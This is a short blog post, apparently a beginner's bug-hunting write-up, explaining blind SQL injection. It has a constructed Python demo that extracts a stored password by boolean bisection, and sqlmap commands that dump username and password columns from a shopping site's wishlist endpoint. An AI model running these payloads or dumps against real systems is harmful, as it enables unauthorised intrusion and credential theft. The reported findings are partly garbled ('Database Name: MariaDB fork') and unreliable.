Blind SQL Injection
Hello guys, this is my first Medium blog. I’m going to explain blind SQL injection and how I found it on an e-commerce website.
Summary :
Blind SQL injection is used when the web application gives back no output and no error: the page never reflects query results, so a UNION-based injection has nothing to read, and it never returns database errors, so the error-based tricks (XPath-function errors such as ExtractValue/UpdateXML on MySQL, or subquery errors) that leak data through the error message do not work either. With a blind injection we instead ask the database a series of yes/no questions and read each answer from the application's behaviour, either a boolean difference in the response (page found or not found) or a time delay, and rebuild the data one answer at a time.
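To make the yes/no idea concrete, here is an added, constructed example in Python; it is not code from the original post and it does not target the real site. It builds a stand-in endpoint with the same shape of bug (a product ID concatenated into the query, with the client only learning found/not found and errors swallowed), then recovers a string from the database by bisecting each character's code point. The product ID 648684 is reused from the post; the tables, the `users` row and the SQLite spelling of the payload (`unicode(substr(...))`, which on MySQL would be `ASCII(SUBSTRING(...))`) are assumptions for the demo.

```python
import sqlite3

# Constructed stand-in for the vulnerable endpoint (not the real site): the
# `product` value is concatenated straight into the query, and the caller
# learns only whether a row came back. Errors are swallowed, so there is no
# UNION output and no error text to read: a blind injection target.
def build_app():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products VALUES (648684, 'constructed product');
        INSERT INTO users VALUES (1, 'admin', 's3cr3t!');
    """)

    def endpoint(product: str) -> bool:
        sql = f"SELECT name FROM products WHERE id = {product}"  # the injection bug
        try:
            return conn.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False  # a database error never reaches the client
    return endpoint


def ask(endpoint, condition: str) -> bool:
    """One yes/no question. The known-good product ID keeps the row matching
    only while `condition` is true, so 'found' means yes and 'not found' means no."""
    return endpoint(f"648684 AND ({condition})")


def extract(endpoint, expr: str, max_len: int = 64) -> str:
    """Recover the string value of SQL expression `expr` one character at a time,
    bisecting each character's code point: 7 questions per character instead of
    up to ~95 with a linear scan. SQLite spelling is unicode(substr(...)); on
    MySQL the same idea reads ASCII(SUBSTRING(...))."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Does the character at `pos` have a code point above mid?
            if ask(endpoint, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end: substr() is empty, so no comparison is ever true
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    app = build_app()
    print(extract(app, "SELECT username FROM users WHERE id = 1"))  # admin
    print(extract(app, "SELECT password FROM users WHERE id = 1"))  # s3cr3t!
```

The only thing the attacker ever sees is the found/not-found bit from `endpoint`, which is exactly what sqlmap's boolean-based technique automates: it first finds a condition that flips the page, then drives the same bisection over whatever you ask it to enumerate.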
While testing for normal SQL injection I thought of trying blind SQL injection. So at first I used some payloads to detect blind SQL injection, and it gave me an error of 403 Forbidden; then I used the fuzzing technique with Burp Suite, and that didn’t work either, so the only option left was sqlmap. I used sqlmap, but it failed too.
POC :
Vulnerable Parameter : product=648684
Request :
- Payload for 1st detection : sqlmap -u "https://www.example.com/advancedwishlist/index/add/product/648684/<key>" --dbs --dump
This didn’t work so I used different flags of sqlmap for Blind Sql Injection
- Payload for 2nd detection : sqlmap -u "https://www.example.com/advancedwishlist/index/add/product/648684/<key>" --data "product=648684" --technique=B --dump --level=5 --risk=3 -T users -C username,password
--data (send the request as POST with this body; sqlmap then tests the parameters in it, here product)
--technique=B (restrict the tests to boolean-based blind injection; the default BEUSTQ tries every technique)
-C (DBMS database table column(s) to enumerate)
-T (DBMS database table(s) to enumerate)
--dump (dump DBMS database table entries)
--level (level of tests to perform (1 to 5, default 1); higher levels also test headers such as Cookie, User-Agent and Referer)
--risk (risk of tests to perform (1 to 3, default 1); risk 3 adds OR-based payloads, which can modify data if the vulnerable statement is an UPDATE or DELETE, so use it with care on a live site)
It worked, but I was able to retrieve only the database name, its version, and the web application technology used by the website.
- Web-Application Technology : PHP
- Back-end DBMS Version : MySQL >= 8.0.0
- Database Name : MariaDB fork
Thank You :)
Instagram : jerry._.3